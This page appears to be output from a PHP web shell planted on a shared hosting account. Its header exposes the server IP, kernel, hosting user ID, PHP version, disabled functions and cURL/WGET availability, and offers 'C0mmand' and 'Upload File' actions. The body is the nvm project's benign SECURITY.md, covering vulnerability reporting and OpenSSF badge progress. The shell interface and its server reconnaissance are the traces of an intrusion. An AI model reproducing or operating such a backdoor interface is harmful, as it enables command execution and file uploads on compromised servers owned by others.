|
Server IP : 2a02:4780:11:767:0:2c41:85d9:6 / Your IP : 216.73.216.135 Web Server : LiteSpeed System : Linux in-mum-web667.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64 User : u742491609 ( 742491609) PHP Version : 8.1.34 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u742491609/.nvm/.github/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
# Security Please email [@ljharb](https://github.com/ljharb) or see https://tidelift.com/security if you have a potential security vulnerability to report. ## OpenSSF CII Best Practices [](https://bestpractices.coreinfrastructure.org/projects/684) There are three “tiers”: passing, silver, and gold. ### Passing We meet 100% of the “passing” criteria. ### Silver We meet 95% of the “silver” criteria. The gaps are as follows: - we do not have a DCO or a CLA process for contributions. - because we only have one maintainer, the project has no way to continue if that maintainer stops being active. - we do not currently document “what the user can and cannot expect in terms of security” for our project. This is planned to be completed in 2023. ### Gold We meet 65% of the “gold” criteria. The gaps are as follows: - we do not yet have the “silver” badge; see all the gaps above. - We do not include a copyright or license statement in each source file. Efforts are underway to change this archaic practice into a suggestion instead of a hard requirement. ## Threat Model See [THREAT_MODEL.md](./THREAT_MODEL.md).